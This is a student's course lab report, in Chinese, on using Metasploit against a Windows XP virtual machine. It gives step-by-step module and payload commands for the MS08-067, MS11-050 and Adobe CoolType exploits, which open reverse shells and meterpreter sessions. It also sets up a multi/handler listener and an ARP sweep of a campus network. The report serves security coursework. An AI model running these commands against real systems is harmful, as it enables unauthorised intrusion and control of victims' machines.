20145202马超《网络对抗》Exp5MSF基础应用
20145202马超《网络对抗》Exp5MSF基础应用
本实践目标,掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路。具体需要完成(1)一个主动攻击,如ms08_067;(2)一个针对浏览器的攻击,如ms11_050;(3)一个针对客户端的攻击,如Adobe(4)成功应用任何一个辅助模块。
以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除0.5分。
实验指导(http://www.cnblogs.com/yayaer/p/6690577.html)
报告内容
MS08_067漏洞渗透攻击实践
1、两台虚拟机,其中一台为kali,一台为windows xp sp3(英文版)。
2、在VMware中设置两台虚拟机网络为NAT模式,自动分配IP地址,之后两台虚拟机就可以直接ping通。
这之间遇到了一个问题,电脑卡死了导致再打开kali的时候发现ip不对,不会调,结果偶然间发现n年前快照过一次,恢复快照后又能用了
如果ping不通,一般是ip地址不在同一个网段上,需要重新设置xp的ip地址,打开:控制面板->网络连接->右击本地连接选择属性->选择internet协议(TCP/IP)->属性,就可以编辑ip地址了。例如:kali ip是192.168.23.129,xp ip设置为:192.168.23.128。前三位一样,最后一位随便设置。
3.在kali终端中开启msfconsole。
4.输入命令search ms08_067,会显示出找到的渗透模块,如下图所示
5.输入命令use exploit/windows/smb/ms08_067_netapi,进入该漏洞模块的使用。
6、输入命令show payload会显示出有效的攻击载荷,如下图所示,我们找到一个shell_reverse_tcp。
7.命令show targets会显示出可以被攻击的靶机的操作系统型号。
8.使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷。
9、输入命令show options显示我们需要在攻击前需要设置的数据。
10、输入命令
set LHOST "kali Ip"
set RHOST "Win xp Ip
11、输入命令exploit开始攻击,如下图所示是正常攻击成功结果
IE浏览器渗透攻击——MS11050安全漏洞
1.在kali终端中开启msfconsole。
2、输入命令use windows/browser/ms11_050_mshtml_cobjectelement,进入该漏洞模块。
3、输入info查看信息:
4.设置对应的载荷set payload windows/meterpreter/reverse_tcp
5、show options查看需要设置的相关信息
6、设置相关信息
set LHOST ‘kali Ip’
set LPORT XXXX
set URIPATH XX
7、exploit,如下图所示,有靶机需要访问的ip地址:
8、在靶机IE上输入网址,并在靶机上查看信息。
到了这里我遇到了一个问题,就是sp3里面的浏览器不是ie7,所以上图会显示成那样,没有session 1,后来我又尝试下了很多ie7的安装包但是实在是太卡了而且无数盗版,所以就没有再做下去,如果换了浏览器理论上是可以做出结果的我距离结果也就差一步,但是这个实验要求上说的很清楚,“掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路”,重点在掌握思路,所以我就没有在做下去,如果扣分的话请老师在评论区里说一下要扣分我就把这个补上。
Adobe阅读器渗透攻击
1、两台虚拟机,其中一台为kali,一台为windows xp sp3。
2、设置虚拟机网络为NAT模式,保证两台虚拟机可以ping通。
3、kali下打开显示隐藏文件,如下图,先打开主文件夹,在右上角打开如下图所示位置:
4.在kali终端中开启msfconsole。
5、输入命令use exploit/windows/fileformat/adobe_cooltype_sing,进入该漏洞模块的使用。
6、使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷。
7、输入命令show options显示我们需要在攻击前需要设置的数据.
8.输入命令
set FILENAME xxx.pdf
set LHOST "KALI Ip"
set LPORT xxxx
9.输入exploit,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里。
10.使用命令back退出当前模块,并使用use exploit/multi/handler新建一个监听模块。
11、使用set payload windows/meterpreter/reverse_tcp建立一个反向连接。如下图所示,我需要输入命令set LPORT 5555和攻击模块里的数据设置为一样的。
12、使用命令exploit开始攻击,在xp中打开pdf。如下图:
这很明显,攻击成功了
自己做的辅助模块
1.将kali机的模式改为桥接模式,使他和主机ping通,主机连接的是无线网。
2.先手动创建一个msf所需的数据库
service postgresql start
msfdb start
3、开启msf
4.输入命令 use auxiliary/scanner/discovery/arp_sweep进入模块
5.show options查看需要设置的消息,其中rhost填写自己电脑所在网段
6.使用命令,设置
set interface eth0
set RHOSTS 172.30.1.0/21
set threads 2
7.run
应该是网络的问题,它提示没有ipv4的地址,而且我的虚拟机提示网桥没有正确打开,网桥崩了,求解决方案。
解决了之后有了ip
run之后结果:
当时宿舍没人用电脑,嗯,的确是这样。而且貌似打开防火墙的话扫描不到。
8.
实验指导(http://www.cnblogs.com/yayaer/p/6685527.html)
1.实验后回答问题
(1)用自己的话解释什么是exploit,payload,encode.
exploit:在kali里面进行攻击的时候要使用的代码是exploit
payload:目测来看是一种攻击载体,然而我并不知道什么事攻击载体,感觉类似于声音借助于空气转播,声音是恶意代码,人类是靶机,空气就是payload
encode:直译为编码,顾名思义就是把恶意代码进行编码然后免杀
2.实验总结与体会
- 感觉i3实在是不行了,太慢了。
- 对于这次实验的话,感觉攻击手段还是很多样的,在于如何去发现咯偶懂以及利用漏洞,而我们做的只是利用漏洞,说白了只是完成了最后一击,玩别人剩下的,想必那些黑客门天天研究有哪些漏洞有哪些后门真心挺累的。
- 漏洞这种东西很强大,点开一个pdf就能被控制,而且作为一个平民百姓也不可能用多么高深的手段去防守,与其每天吓唬自己还不如该干啥干啥。
3.实践过程记录,体现学号,可记录自己认为重要的或思考过的点,不需要每步都记录
